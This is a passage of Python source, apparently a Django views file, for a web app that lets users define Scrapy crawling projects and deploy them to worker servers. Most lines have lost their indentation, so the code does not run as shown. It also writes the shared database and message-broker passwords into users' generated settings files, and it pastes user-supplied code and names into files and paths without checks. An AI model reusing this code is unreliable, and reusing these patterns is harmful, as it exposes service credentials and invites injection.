mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('grantRolesToUser', request.user.username,
roles=[{'role': 'dbOwner', 'db': mongodbname}])
connection.close()
dataset = Dataset()
dataset.user = request.user
dataset.database = mongodbname
dataset.save()
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
else:
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
else:
return HttpResponseNotFound('Nothing is here.')
@login_required
def manage_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
projectdata = {}
projectdata['settings_scraper'] = project.settings_scraper
projectdata['settings_link_generator'] = project.settings_link_generator
projectdata['items'] = []
projectdata['pipelines'] = []
if len(project.link_generator) == 0:
projectdata['link_generator'] = False
else:
projectdata['link_generator'] = True
if len(project.scraper_function) == 0:
projectdata['scraper_function'] = False
else:
projectdata['scraper_function'] = True
items = Item.objects.filter(project=project)
pipelines = Pipeline.objects.filter(project=project)
for item in items:
projectdata['items'].append(item)
for pipeline in pipelines:
projectdata['pipelines'].append(pipeline)
return render(request, 'manageproject.html',
{'username': request.user.username, 'project': project.project_name, 'projectdata': projectdata})
@login_required
def delete_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = DeleteProject()
return render(request, 'deleteproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
project.delete()
return HttpResponseRedirect(reverse("mainpage"))
else:
return HttpResponseNotFound('Nothing is here.')
@login_required
def create_item(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form1 = ItemName()
form2 = FieldName()
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1, 'form2': form2, 'project': project.project_name})
if request.method == 'POST':
if 'submit' in request.POST:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
if form1.is_valid() and form2.is_valid():
item = Item.objects.filter(project=project, item_name=form1.cleaned_data['itemname'])
if len(item):
errors = form1._errors.setdefault("itemname", ErrorList())
errors.append(
'Item named %s already exists. Please choose another name' % form1.cleaned_data['itemname'])
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
                allfields = []
valuetofield = {}
for field in form2.fields:
if form2.cleaned_data[field]:
if field != 'extra_field_count':
valuetofield[form2.cleaned_data[field]] = field
allfields.append(form2.cleaned_data[field])
                duplicates = [list(j) for i, j in groupby(sorted(allfields))]  # sort first: groupby only groups adjacent equal items
for duplicate in duplicates:
if len(duplicate) > 1:
errors = form2._errors.setdefault(valuetofield[duplicate[0]], ErrorList())
errors.append('Duplicate fields are not allowed.')
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
item = Item()
item.item_name = form1.cleaned_data['itemname']
item.project = project
item.save()
for field in allfields:
onefield = Field()
onefield.item = item
onefield.field_name = field
onefield.save()
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
@login_required
def itemslist(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
itemtracker = 0
items = Item.objects.filter(project=project)
itemdata = []
for item in items:
itemdata.append([])
itemdata[itemtracker].append(item.item_name)
fields = Field.objects.filter(item=item)
if fields:
itemdata[itemtracker].append([])
for field in fields:
itemdata[itemtracker][1].append(field.field_name)
itemtracker += 1
return render(request, 'itemslist.html',
{'username': request.user.username, 'project': project.project_name, 'items': itemdata})
@login_required
def deleteitem(request, projectname, itemname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
item = Item.objects.get(project=project, item_name=itemname)
except Item.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
# using the form that was used for deleting the project
form = DeleteProject()
return render(request, 'deleteitem.html',
{'username': request.user.username, 'form': form, 'projectname': projectname, 'itemname': itemname})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(projectname,)))
elif 'submit' in request.POST:
item.delete()
return HttpResponseRedirect(reverse("listitems", args=(projectname,)))
@login_required
def edititem(request, projectname, itemname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
item = Item.objects.get(project=project, item_name=itemname)
except Item.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
fields = Field.objects.filter(item=item)
fieldcounter = 0
fieldlist = []
fielddata = {}
for field in fields:
fieldlist.append(field.field_name)
fieldcounter += 1
if fieldcounter == 1:
fielddata['fieldname'] = fieldlist[0]
fielddata['extra_field_count'] = 0
elif fieldcounter > 1:
fielddata['fieldname'] = fieldlist[0]
fielddata['extra_field_count'] = fieldcounter - 1
            for i in range(1, fieldcounter):
fielddata['field_%d' % (i+1)] = fieldlist[i]
form1 = ItemName({'itemname': itemname})
form2 = FieldName(initial=fielddata, extra=fielddata['extra_field_count'])
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1, 'form2': form2, 'project': project.project_name})
elif request.method == 'POST':
if 'submit' in request.POST:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
if form1.is_valid() and form2.is_valid():
newitemname = Item.objects.filter(project=project, item_name=form1.cleaned_data['itemname'])
if len(newitemname):
for oneitem in newitemname:
if oneitem.item_name != item.item_name:
errors = form1._errors.setdefault('itemname', ErrorList())
errors.append('Item named %s already exists. Please choose another name' % form1.cleaned_data['itemname'])
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
allfields = []
valuetofield = {}
for field in form2.fields:
if form2.cleaned_data[field]:
if field != 'extra_field_count':
valuetofield[form2.cleaned_data[field]] = field
allfields.append(form2.cleaned_data[field])
                duplicates = [list(j) for i, j in groupby(sorted(allfields))]  # sort first: groupby only groups adjacent equal items
for duplicate in duplicates:
if len(duplicate) > 1:
errors = form2._errors.setdefault(valuetofield[duplicate[0]], ErrorList())
errors.append('Duplicate fields are not allowed.')
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
deletefield = Field.objects.filter(item=item)
for field in deletefield:
field.delete()
item.item_name = form1.cleaned_data['itemname']
item.save()
for field in allfields:
onefield = Field()
onefield.item = item
onefield.field_name = field
onefield.save()
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
@login_required
def addpipeline(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
defined_items = {}
items = Item.objects.filter(project=project)
for item in items:
defined_items[item.item_name] = []
fields = Field.objects.filter(item=item)
for field in fields:
defined_items[item.item_name].append(field.field_name)
if request.method == 'GET':
initial_code = '''def process_item(self, item, spider):\n return item
'''
form = CreatePipeline(initial={'pipelinefunction': initial_code})
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
if 'submit' in request.POST:
form = CreatePipeline(request.POST)
if form.is_valid():
names = []
                orders = []
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
names.append(pipeline.pipeline_name)
orders.append(pipeline.pipeline_order)
if form.cleaned_data['pipelinename'] in names:
errors = form._errors.setdefault('pipelinename', ErrorList())
errors.append(
'Pipeline named %s already exists. Please choose another name' % form.cleaned_data['pipelinename'])
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
if int(form.cleaned_data['pipelineorder']) in orders:
errors = form._errors.setdefault('pipelineorder', ErrorList())
errors.append(
'Pipeline order %s already exists for another pipeline function. Enter a different order' % form.cleaned_data['pipelineorder'])
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
pipeline = Pipeline()
pipeline.pipeline_name = form.cleaned_data['pipelinename']
pipeline.pipeline_order = form.cleaned_data['pipelineorder']
pipeline.pipeline_function = form.cleaned_data['pipelinefunction']
pipeline.project = project
pipeline.save()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
else:
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
@login_required
def pipelinelist(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
itemtracker = 0
pipelines = Pipeline.objects.filter(project=project)
pipelinedata = []
for pipeline in pipelines:
pipelinedata.append([])
pipelinedata[itemtracker].append(pipeline.pipeline_name)
pipelinedata[itemtracker].append(pipeline.pipeline_order)
itemtracker += 1
return render(request, 'pipelinelist.html', {'username': request.user.username, 'project': project.project_name, 'items': pipelinedata})
@login_required
def editpipeline(request, projectname, pipelinename):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
pipeline = Pipeline.objects.get(project=project, pipeline_name=pipelinename)
except Pipeline.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
defined_items = {}
items = Item.objects.filter(project=project)
for item in items:
defined_items[item.item_name] = []
fields = Field.objects.filter(item=item)
for field in fields:
defined_items[item.item_name].append(field.field_name)
if request.method == 'GET':
form = CreatePipeline(initial={'pipelinename': pipeline.pipeline_name,
'pipelineorder': pipeline.pipeline_order,
'pipelinefunction': pipeline.pipeline_function})
return render(request, "editpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
if 'submit' in request.POST:
form = CreatePipeline(request.POST)
if form.is_valid():
newpipelinename = Pipeline.objects.filter(project=project, pipeline_name=form.cleaned_data['pipelinename'])
if len(newpipelinename):
for oneitem in newpipelinename:
if oneitem.pipeline_name != pipeline.pipeline_name:
errors = form._errors.setdefault('pipelinename', ErrorList())
errors.append(
'Pipeline named %s already exists. Please choose another name' % form.cleaned_data[
'pipelinename'])
return render(request, 'editpipeline.html',
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
newpipelineorder = Pipeline.objects.filter(project=project,
pipeline_order=form.cleaned_data['pipelineorder'])
if len(newpipelineorder):
for oneitem in newpipelineorder:
if oneitem.pipeline_order != pipeline.pipeline_order:
errors = form._errors.setdefault('pipelineorder', ErrorList())
errors.append(
'Pipeline order %s already exists for another pipeline function. Enter a different order' % form.cleaned_data['pipelineorder'])
return render(request, 'editpipeline.html',
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
pipeline.pipeline_name = form.cleaned_data['pipelinename']
pipeline.pipeline_order = form.cleaned_data['pipelineorder']
pipeline.pipeline_function = form.cleaned_data['pipelinefunction']
pipeline.save()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
else:
return render(request, "editpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
@login_required
def deletepipeline(request, projectname, pipelinename):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
pipeline = Pipeline.objects.get(project=project, pipeline_name=pipelinename)
except Pipeline.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = DeleteProject()
return render(request, 'deletepipeline.html',
{'username': request.user.username,
'form': form, 'projectname': project.project_name, 'pipelinename': pipeline.pipeline_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
elif 'submit' in request.POST:
pipeline.delete()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
@login_required
def linkgenerator(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
spiderclassnamelabel = "class " + request.user.username.title() + project.project_name.title() + "Spider:"
if request.method == 'GET':
form = LinkGenerator(initial={'function': project.link_generator})
form.fields['function'].label = spiderclassnamelabel
return render(request,
'addlinkgenerator.html', {'username': request.user.username,
'form': form, 'project': project.project_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
if 'submit' in request.POST:
form = LinkGenerator(request.POST)
form.fields['function'].label = spiderclassnamelabel
if form.is_valid():
project.link_generator = form.cleaned_data['function']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
else:
return render(request, 'addlinkgenerator.html',
{'username': request.user.username, 'form': form, 'project': project.project_name})
@login_required
def scraper(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
spiderclassnamelabel = "class " + request.user.username.title() + project.project_name.title() + "Spider:"
if request.method == 'GET':
form = Scraper(initial={'function': project.scraper_function})
form.fields['function'].label = spiderclassnamelabel
return render(request, 'addscraper.html', {'username': request.user.username, 'form': form, 'project': project.project_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
if 'submit' in request.POST:
form = Scraper(request.POST)
form.fields['function'].label = spiderclassnamelabel
if form.is_valid():
project.scraper_function = form.cleaned_data['function']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
else:
return render(request, 'addscraper.html',
{'username': request.user.username, 'form': form, 'project': project.project_name})
def create_folder_tree(tree):
d = os.path.abspath(tree)
if not os.path.exists(d):
os.makedirs(d)
else:
shutil.rmtree(d)
os.makedirs(d)
@login_required
def change_password(request):
if request.method == 'POST':
form = ChangePass(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user)
mongodb_user_password_change(request.user.username, form.cleaned_data['new_password1'])
if settings.LINUX_USER_CREATION_ENABLED:
try:
linux_user_pass_change(request.user.username, form.cleaned_data['new_password1'])
                except Exception:
pass
return HttpResponseRedirect(reverse("mainpage"))
else:
return render(request, 'changepassword.html', {
'username': request.user.username,
'form': form
})
else:
form = ChangePass(request.user)
return render(request, 'changepassword.html', {
'username': request.user.username,
'form': form
})
@login_required
def deploy(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
projectitems = Item.objects.filter(project=project)
projectlinkgenfunction = project.link_generator
projectscraperfunction = project.scraper_function
if not projectitems or not projectlinkgenfunction or not projectscraperfunction:
return HttpResponseNotFound('Not all required project parts are present for deployment. Please review your project and deploy again.')
basepath = os.path.dirname(os.path.abspath(__file__))
    # we are giving a project and its folders a unique name on disk, so that no name conflicts occur when deploying the projects
    projectnameonfile = request.user.username + '_' + projectname
    # removing the project folder, if it exists
    create_folder_tree(basepath + "/projects/%s/%s" % (request.user.username, projectname))
    # Create project folder structure
    folder1 = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile, 'spiders')
    folder2 = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile, 'spiders')
    # Link generator folders
linkgenouterfolder = basepath + "/projects/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator')
linkgenprojectfolder = basepath + "/projects/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile)
linkgenspiderfolder = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile, 'spiders')
    # Scraper folders
scraperouterfolder = basepath + "/projects/%s/%s/%s" % (request.user.username, projectname, 'scraper')
scraperprojectfolder = basepath + "/projects/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile)
scraperspiderfolder = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile, 'spiders')
    # Link generator files
linkgencfgfile = linkgenouterfolder + "/scrapy.cfg"
linkgensettingsfile = linkgenprojectfolder + "/settings.py"
linkgenspiderfile = linkgenspiderfolder + "/%s_%s.py" % (request.user.username, projectname)
    # Scraper files
scrapercfgfile = scraperouterfolder + "/scrapy.cfg"
scrapersettingsfile = scraperprojectfolder + "/settings.py"
scraperspiderfile = scraperspiderfolder + "/%s_%s.py" % (request.user.username, projectname)
scraperitemsfile = scraperprojectfolder + "/items.py"
scraperpipelinefile = scraperprojectfolder + "/pipelines.py"
    # Create needed folders
create_folder_tree(folder1)
create_folder_tree(folder2)
    # putting __init__.py files in linkgenerator
    shutil.copy(basepath + '/scrapy_packages/__init__.py', linkgenprojectfolder)
    shutil.copy(basepath + '/scrapy_packages/__init__.py', linkgenspiderfolder)
    # putting rabbitmq folder alongside project
    shutil.copytree(basepath + '/scrapy_packages/rabbitmq', linkgenprojectfolder + '/rabbitmq')
    # creating a cfg for link generator
scrapycfg = '''[settings]\n
default = %s.settings
[deploy:linkgenerator]
url = %s
project = %s
''' % (projectnameonfile, settings.LINK_GENERATOR, projectnameonfile)
with open(linkgencfgfile, 'w') as f:
f.write(scrapycfg)
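    # (For a hypothetical user 'alice' with project 'news', the scrapy.cfg
    # written above would look roughly like:
    #   [settings]
    #   default = alice_news.settings
    #   [deploy:linkgenerator]
    #   url = <settings.LINK_GENERATOR>
    #   project = alice_news
    # -- the names here are illustrative only.)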
    # creating a settings.py file for link generator
with open(basepath + '/scrapy_templates/settings.py.tmpl', 'r') as f:
settingspy = Template(f.read()).substitute(project_name=projectnameonfile)
settingspy += '\n' + project.settings_link_generator
settingspy += '\nSCHEDULER = "%s"' % (projectnameonfile + settings.SCHEDULER)
settingspy += '\nSCHEDULER_PERSIST = %s' % settings.SCHEDULER_PERSIST
settingspy += '\nRABBITMQ_HOST = "%s"' % settings.RABBITMQ_HOST
settingspy += '\nRABBITMQ_PORT = %s' % settings.RABBITMQ_PORT
settingspy += '\nRABBITMQ_USERNAME = "%s"' % settings.RABBITMQ_USERNAME
settingspy += '\nRABBITMQ_PASSWORD = "%s"' % settings.RABBITMQ_PASSWORD
with open(linkgensettingsfile, 'w') as f:
f.write(settingspy)
    # creating a spider file for link generator
with open(basepath + '/scrapy_templates/linkgenspider.py.tmpl', 'r') as f:
spider = Template(f.read()).substitute(spider_name=request.user.username + "_" + projectname, SpiderClassName=request.user.username.title() + projectname.title() + "Spider")
spider += '\n'
linkgenlines = project.link_generator.splitlines()
for lines in linkgenlines:
spider += ' ' + lines + '\n'
with open(linkgenspiderfile, 'w') as f:
f.write(spider)
    # putting __init__.py files in scraper
shutil.copy(basepath + '/scrapy_packages/__init__.py', scraperprojectfolder)
shutil.copy(basepath + '/scrapy_packages/__init__.py', scraperspiderfolder)
# putting rabbitmq folder alongside project
shutil.copytree(basepath + '/scrapy_packages/rabbitmq', scraperprojectfolder + '/rabbitmq')
# putting mongodb folder alongside project
shutil.copytree(basepath + '/scrapy_packages/mongodb', scraperprojectfolder + '/mongodb')
# creating a cfg for scraper
scrapycfg = '''[settings]\n
default = %s.settings\n\n''' % (projectnameonfile)
workercount = 1
for worker in settings.SCRAPERS:
scrapycfg += '[deploy:worker%d]\nurl = %s\n' % (workercount, worker)
workercount += 1
scrapycfg += '\nproject = %s' % (projectnameonfile)
with open(scrapercfgfile, 'w') as f:
f.write(scrapycfg)
# creating a spider file for scraper
with open(basepath + '/scrapy_templates/scraperspider.py.tmpl', 'r') as f:
spider = Template(f.read()).substitute(spider_name=request.user.username + "_" + projectname,
SpiderClassName=request.user.username.title() + projectname.title() + "Spider",
project_name=projectnameonfile)
spider += '\n'
scraperlines = project.scraper_function.splitlines()
for lines in scraperlines:
spider += ' ' + lines + '\n'
with open(scraperspiderfile, 'w') as f:
f.write(spider)
    # creating items file for scraper
items = Item.objects.filter(project=project)
itemsfile = 'import scrapy\n'
fieldtemplate = ' %s = scrapy.Field()\n'
for item in items:
itemsfile += 'class %s(scrapy.Item):\n' % item.item_name
fields = Field.objects.filter(item=item)
for field in fields:
itemsfile += fieldtemplate % field.field_name
itemsfile += fieldtemplate % 'ack_signal'
itemsfile += '\n'
with open(scraperitemsfile, 'w') as f:
f.write(itemsfile)
    # creating pipelines file for scraper
pipelinesfile = ''
pipelinedict = {}
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
pipelinedict[pipeline.pipeline_name] = pipeline.pipeline_order
pipelinesfile += 'class %s(object):\n' % pipeline.pipeline_name
pipfunctionlines = pipeline.pipeline_function.splitlines()
for lines in pipfunctionlines:
pipelinesfile += ' ' + lines + '\n'
with open(scraperpipelinefile, 'w') as f:
f.write(pipelinesfile)
# creating a settings.py file for scraper
with open(basepath + '/scrapy_templates/settings.py.tmpl', 'r') as f:
settingspy = Template(f.read()).substitute(project_name=projectnameonfile)
settingspy += '\n' + project.settings_scraper
settingspy += '\nSCHEDULER = "%s"' % (projectnameonfile + settings.SCHEDULER)
settingspy += '\nSCHEDULER_PERSIST = %s' % settings.SCHEDULER_PERSIST
settingspy += '\nRABBITMQ_HOST = "%s"' % settings.RABBITMQ_HOST
settingspy += '\nRABBITMQ_PORT = %s' % settings.RABBITMQ_PORT
settingspy += '\nRABBITMQ_USERNAME = "%s"' % settings.RABBITMQ_USERNAME
settingspy += '\nRABBITMQ_PASSWORD = "%s"' % settings.RABBITMQ_PASSWORD
settingspy += '\nMONGODB_URI = "%s"' % settings.MONGODB_URI
settingspy += '\nMONGODB_SHARDED = %s' % settings.MONGODB_SHARDED
settingspy += '\nMONGODB_BUFFER_DATA = %s' % settings.MONGODB_BUFFER_DATA
settingspy += '\nMONGODB_USER = "%s"' % settings.MONGODB_USER
settingspy += '\nMONGODB_PASSWORD = "%s"' % settings.MONGODB_PASSWORD
settingspy += '\nITEM_PIPELINES = { "%s.mongodb.scrapy_mongodb.MongoDBPipeline": 999, \n' % projectnameonfile
for key in pipelinedict:
settingspy += '"%s.pipelines.%s": %s, \n' % (projectnameonfile, key, pipelinedict[key])
settingspy += '}'
with open(scrapersettingsfile, 'w') as f:
f.write(settingspy)
    # putting setup.py files in appropriate folders
with open(basepath + '/scrapy_templates/setup.py', 'r') as f:
setuppy = Template(f.read()).substitute(projectname=projectnameonfile)
with open(linkgenouterfolder + '/setup.py', 'w') as f:
f.write(setuppy)
with open(scraperouterfolder + '/setup.py', 'w') as f:
f.write(setuppy)
class cd:
"""Context manager for changing the current working directory"""
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
with cd(linkgenouterfolder):
os.system("python setup.py bdist_egg")
with cd(scraperouterfolder):
os.system("python setup.py bdist_egg")
linkgeneggfile = glob.glob(linkgenouterfolder + "/dist/*.egg")
scrapereggfile = glob.glob(scraperouterfolder + "/dist/*.egg")
linkgenlastdeploy = LinkgenDeploy.objects.filter(project=project).order_by('-version')[:1]
if linkgenlastdeploy:
linkgenlastdeploy = linkgenlastdeploy[0].version
else:
linkgenlastdeploy = 0
scraperslastdeploy = ScrapersDeploy.objects.filter(project=project).order_by('-version')[:1]
if scraperslastdeploy:
scraperslastdeploy = scraperslastdeploy[0].version
else:
scraperslastdeploy = 0
try:
with open(linkgeneggfile[0], 'rb') as f:
files = {'egg': f}
payload = {'project': '%s' % (projectnameonfile), 'version': (linkgenlastdeploy + 1)}
r = requests.post('%s/addversion.json' % settings.LINK_GENERATOR, data=payload, files=files, timeout=(3, None))
result = r.json()
deploylinkgen = LinkgenDeploy()
deploylinkgen.project = project
deploylinkgen.version = linkgenlastdeploy + 1
if result["status"] != "ok":
deploylinkgen.success = False
else:
deploylinkgen.success = True
deploylinkgen.save()
    except Exception:
deploylinkgen = LinkgenDeploy()
deploylinkgen.project = project
deploylinkgen.version = linkgenlastdeploy + 1
deploylinkgen.success = False
deploylinkgen.save()
with open(scrapereggfile[0], 'rb') as f:
eggfile = f.read()
files = {'egg' : eggfile}
payload = {'project': '%s' % (projectnameonfile), 'version': (scraperslastdeploy + 1)}
deployscraper = ScrapersDeploy()
deployscraper.project = project
deployscraper.version = scraperslastdeploy + 1
deployedscraperslist = []
scrapercounter = 1
for onescraper in settings.SCRAPERS:
try:
r = requests.post('%s/addversion.json' % onescraper, data=payload, files=files, timeout=(3, None))
result = r.json()
if result['status'] == 'ok':
                deployedscraperslist.append("worker%s" % scrapercounter)
        except Exception:
pass
scrapercounter += 1
deployscraper.success = json.dumps(deployedscraperslist)
deployscraper.save()
return HttpResponseRedirect(reverse('deploystatus', args=(projectname,)))
@login_required
def deployment_status(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
counter = 1
workers.append({'name': 'linkgenerator', 'status': 'Loading...', 'version': 'Loading...'})
for worker in settings.SCRAPERS:
workers.append({'name': 'worker%s' % counter, 'status': 'Loading...', 'version': 'Loading...'})
counter += 1
return render(request, "deployment_status.html", {'project': projectname, 'username': request.user.username, 'workers': workers})
@login_required
def get_project_status_from_all_workers(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
counter = 1
if request.method == 'POST':
allworkers = []
workerstatus = {}
workerstatus['name'] = 'linkgenerator'
        try:
            r = requests.get('%s/listprojects.json' % settings.LINK_GENERATOR, timeout=(3, None))
            result = r.json()
            if uniqueprojectname in result['projects']:
                workerstatus['status'] = 'ready'
                try:
                    q = requests.get('%s/listversions.json' % settings.LINK_GENERATOR, params={'project': uniqueprojectname}, timeout=(3, None))
                    qresult = q.json()
                    version = qresult['versions'][-1]
                    workerstatus['version'] = version
                except Exception:
                    workerstatus['version'] = 'unknown'
                try:
                    s = requests.get('%s/listjobs.json' % settings.LINK_GENERATOR, params={'project': uniqueprojectname}, timeout=(3, None))
                    sresult = s.json()
                    if sresult['finished']:
                        workerstatus['status'] = 'finished'
                    if sresult['pending']:
                        workerstatus['status'] = 'pending'
                    if sresult['running']:
                        workerstatus['status'] = 'running'
                except Exception:
                    workerstatus['status'] = 'unknown'
            else:
                workerstatus['status'] = 'not deployed'
                workerstatus['version'] = 'unknown'
        except Exception:
            workerstatus['status'] = 'unreachable'
            workerstatus['version'] = 'unknown'
allworkers.append(workerstatus)
for worker in settings.SCRAPERS:
workerstatus = {}
workerstatus['name'] = 'worker%s' % counter
try:
r = requests.get('%s/listprojects.json' % worker, timeout=(3, None))
result = r.json()
if uniqueprojectname in result['projects']:
workerstatus['status'] = 'ready'
try:
q = requests.get('%s/listversions.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
qresult = q.json()
version = qresult['versions'][-1]
workerstatus['version'] = version
except:
workerstatus['version'] = 'unknown'
try:
s = requests.get('%s/listjobs.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
sresult = s.json()
if sresult['finished']:
workerstatus['status'] = 'finished'
if sresult['pending']:
workerstatus['status'] = 'pending'
if sresult['running']:
workerstatus['status'] = 'running'
except:
workerstatus['status'] = 'unknown'
else:
workerstatus['status'] = 'not deployed'
workerstatus['version'] = 'unknown'
except:
workerstatus['status'] = 'unreachable'
workerstatus['version'] = 'unknown'
allworkers.append(workerstatus)
counter += 1
return JsonResponse(allworkers, safe=False)
@login_required
def start_project(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'POST':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.post('%s/schedule.json' % linkgenaddress, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.post('%s/schedule.json' % workeraddress, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
return HttpResponse('sent start signal')
@login_required
def stop_project(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'POST':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.get('%s/listjobs.json' % linkgenaddress,
params={'project': uniqueprojectname}, timeout=(3, None))
